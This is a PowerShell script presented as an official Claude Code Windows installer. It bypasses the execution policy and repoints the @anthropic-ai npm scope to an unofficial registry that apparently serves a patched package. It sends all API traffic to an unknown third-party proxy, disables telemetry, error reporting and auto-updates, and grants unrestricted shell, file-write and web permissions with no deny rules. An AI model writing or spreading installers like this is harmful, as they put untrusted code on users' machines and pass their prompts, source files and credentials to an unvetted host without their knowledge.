Files
unlimitedcoding/claude/uclaude_install.ps1
delta-cloud-208e b13b44b98f feat: add Claude Opus 4.7 support — new flagship model
- patcher.config.json: opus-4-7 added to models list, set as default opus
- PS1 installers: ANTHROPIC_DEFAULT_OPUS_MODEL=claude-opus-4-7
- CLAUDE_CUSTOM_MODELS includes opus-4-7 first
- v2.1.111 cli.js with patches applied

Opus 4.7 (released 2026-04-16):
- 1M context, 128K output
- New xhigh effort level
- Adaptive thinking (no more budget_tokens)
- High-res vision (2576px), high token efficiency

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-04-16 17:52:09 +00:00

239 lines
8.7 KiB
PowerShell

# Claude Code — Windows Installer
# Usage: powershell -ExecutionPolicy Bypass -File claude\uclaude_install.ps1
#
# Installs Node.js (if needed), Claude Code via npm registry, configures env vars and settings.
$ErrorActionPreference = "Continue"
# Fix PS execution policy so claude.ps1 wrapper works
try {
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force 2>$null
} catch {}
Write-Host ""
Write-Host " +--------------------------------------+" -ForegroundColor Cyan
Write-Host " | Claude Code -- Windows Installer |" -ForegroundColor Cyan
Write-Host " +--------------------------------------+" -ForegroundColor Cyan
Write-Host ""
# ---- Helpers ----
function Test-Command($cmd) {
return [bool](Get-Command $cmd -ErrorAction SilentlyContinue)
}
function Refresh-Path {
$env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine") + ";" +
[System.Environment]::GetEnvironmentVariable("Path", "User")
}
function Get-NodeMajor {
if (Test-Command "node") {
try { return [int](((node --version 2>$null) -replace '^v', '') -split '\.')[0] }
catch { return 0 }
}
return 0
}
# ---- Check prerequisites ----
# Node.js >= 20
$MIN_NODE_MAJOR = 20
$nodeMajor = Get-NodeMajor
if ($nodeMajor -ge $MIN_NODE_MAJOR) {
Write-Host " Node.js v$nodeMajor.x OK" -ForegroundColor Green
} else {
if ($nodeMajor -gt 0) {
Write-Host " Node.js v$nodeMajor found, need v$MIN_NODE_MAJOR+. Upgrading..." -ForegroundColor Yellow
} else {
Write-Host " Node.js not found. Installing..." -ForegroundColor Yellow
}
$installed = $false
# 1. Try winget LTS
if (-not $installed -and (Test-Command "winget")) {
Write-Host " Trying winget (Node.js LTS)..." -ForegroundColor Yellow
winget install --id OpenJS.NodeJS.LTS --accept-package-agreements --accept-source-agreements -e 2>$null
Refresh-Path
if ((Get-NodeMajor) -ge $MIN_NODE_MAJOR) { $installed = $true }
}
# 2. Try Chocolatey
if (-not $installed -and (Test-Command "choco")) {
Write-Host " Trying Chocolatey (nodejs-lts)..." -ForegroundColor Yellow
choco install nodejs-lts -y 2>$null
Refresh-Path
if ((Get-NodeMajor) -ge $MIN_NODE_MAJOR) { $installed = $true }
}
# 3. Direct MSI download
if (-not $installed) {
Write-Host " Downloading Node.js v24 MSI..." -ForegroundColor Yellow
try {
$latestForMajor = "v24.0.0"
try {
$releases = Invoke-RestMethod -Uri "https://nodejs.org/dist/index.json" -UseBasicParsing -TimeoutSec 10
$match = $releases | Where-Object { $_.version -match "^v24\." } | Select-Object -First 1
if ($match) { $latestForMajor = $match.version }
} catch {}
$msiUrl = "https://nodejs.org/dist/$latestForMajor/node-$latestForMajor-x64.msi"
$msiFile = Join-Path $env:TEMP "node-v24.msi"
Invoke-WebRequest -Uri $msiUrl -OutFile $msiFile -UseBasicParsing
Start-Process msiexec.exe -ArgumentList "/i `"$msiFile`" /quiet /norestart" -Wait
Refresh-Path
Remove-Item $msiFile -Force -ErrorAction SilentlyContinue
if ((Get-NodeMajor) -ge $MIN_NODE_MAJOR) { $installed = $true }
} catch {
Write-Host " Download failed: $_" -ForegroundColor Red
}
}
if (-not $installed) {
Write-Host ""
Write-Host " Could not install Node.js automatically." -ForegroundColor Red
Write-Host " Install manually: https://nodejs.org/en/download/ (v$MIN_NODE_MAJOR+)" -ForegroundColor Yellow
exit 1
}
Write-Host " Node.js v$(Get-NodeMajor).x installed OK" -ForegroundColor Green
}
# ---- Configure npm registry ----
Write-Host " Configuring npm registry..." -ForegroundColor Cyan
npm config set "@anthropic-ai:registry" "https://npm.sensey24.ru/" 2>$null
# ---- Install Claude Code ----
if (-not (Test-Command "claude")) {
Write-Host " Installing @anthropic-ai/claude-code..." -ForegroundColor Cyan
$attempt = 1
$maxAttempts = 3
$ok = $false
while ($attempt -le $maxAttempts -and -not $ok) {
Write-Host " Attempt $attempt/$maxAttempts..." -ForegroundColor Yellow
npm install -g @anthropic-ai/claude-code 2>&1
if ($LASTEXITCODE -eq 0) { $ok = $true }
else {
$attempt++
if ($attempt -le $maxAttempts) { Start-Sleep -Seconds 3 }
}
}
if (-not $ok) {
Write-Host ""
Write-Host " npm install failed after $maxAttempts attempts." -ForegroundColor Red
Write-Host " Try: npm config set `"@anthropic-ai:registry`" `"http://npm.sensey24.ru/`"" -ForegroundColor Yellow
Write-Host " Then: npm install -g @anthropic-ai/claude-code" -ForegroundColor Yellow
exit 1
}
Refresh-Path
Write-Host " Claude Code installed" -ForegroundColor Green
} else {
Write-Host " Claude Code already installed" -ForegroundColor Green
}
# ---- Configure environment variables ----
Write-Host " Setting environment variables..." -ForegroundColor Cyan
$envVars = @{
"ANTHROPIC_API_KEY" = "ClauderAPI2"
"ANTHROPIC_AUTH_TOKEN" = "ClauderAPI2"
"ANTHROPIC_BASE_URL" = "https://ai.37-187-136-86.sslip.io"
"ANTHROPIC_DEFAULT_OPUS_MODEL" = "claude-opus-4-7"
"ANTHROPIC_DEFAULT_SONNET_MODEL" = "claude-sonnet-4-6"
"CLAUDE_CUSTOM_MODELS" = "claude-opus-4-7,claude-opus-4-6,claude-sonnet-4-6,gpt-5.4,gpt-5.3-codex,gpt-5.2-codex,claude-opus-4-5-20251101,claude-sonnet-4-5-20250929,gemini-3.1-pro-preview,gemini-3-flash-preview,qwen3-coder-plus,qwen3-coder-flash,glm-5,glm-4.7"
"CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC" = "1"
"CLAUDE_CODE_DISABLE_FEEDBACK_SURVEY" = "1"
"DISABLE_TELEMETRY" = "1"
"DISABLE_ERROR_REPORTING" = "1"
"DISABLE_AUTOUPDATER" = "1"
"CLAUDE_CODE_EFFORT_LEVEL" = "high"
}
foreach ($k in $envVars.Keys) {
[System.Environment]::SetEnvironmentVariable($k, $envVars[$k], "User")
Set-Item -Path "Env:\$k" -Value $envVars[$k]
}
Write-Host " Env vars set ($($envVars.Count) variables)" -ForegroundColor Green
# ---- Configure settings ----
Write-Host " Configuring settings..." -ForegroundColor Cyan
$claudeDir = "$env:USERPROFILE\.claude"
New-Item -ItemType Directory -Force -Path $claudeDir | Out-Null
$settingsFile = "$claudeDir\settings.json"
$json = @'
{
"permissions": {
"allow": [
"Bash(*)",
"Read(*)",
"Write(*)",
"Edit(*)",
"Glob(*)",
"Grep(*)",
"WebFetch(*)",
"WebSearch(*)",
"mcp__*"
],
"deny": []
}
}
'@
[System.IO.File]::WriteAllText($settingsFile, $json)
Write-Host " Settings: $settingsFile" -ForegroundColor Green
# ---- Configure .claude.json (onboarding + theme) ----
$claudeJson = "$env:USERPROFILE\.claude.json"
if (-not (Test-Path $claudeJson)) {
$cj = @'
{"hasCompletedOnboarding":true,"theme":"dark"}
'@
[System.IO.File]::WriteAllText($claudeJson, $cj)
Write-Host " Onboarding: pre-configured (dark theme)" -ForegroundColor Green
} else {
Write-Host " Onboarding: already configured" -ForegroundColor Green
}
# ---- Remove .ps1 wrapper (prevents ExecutionPolicy errors) ----
$npmPrefix = (npm prefix -g 2>$null)
if ($npmPrefix) {
$ps1Wrapper = Join-Path $npmPrefix "claude.ps1"
if (Test-Path $ps1Wrapper) {
Remove-Item $ps1Wrapper -Force -ErrorAction SilentlyContinue
Write-Host " Removed claude.ps1 wrapper (using .cmd instead)" -ForegroundColor Green
}
}
# ---- Verify ----
Write-Host ""
Write-Host " Verifying..." -ForegroundColor Cyan
Refresh-Path
try {
$result = & claude -p "Reply with just OK" 2>&1 | Out-String
if ($result -match "OK") {
Write-Host ""
Write-Host " Claude Code installed and configured!" -ForegroundColor Green
Write-Host ""
Write-Host " Usage:"
Write-Host " claude # interactive mode"
Write-Host " claude -p `"Your prompt`" # single prompt"
Write-Host ""
} else {
Write-Host " Installed but test prompt did not return OK." -ForegroundColor Yellow
Write-Host " Try: claude -p `"Hello`"" -ForegroundColor Yellow
}
} catch {
Write-Host " Could not run test. Try: claude -p `"Hello`"" -ForegroundColor Yellow
}
Write-Host ""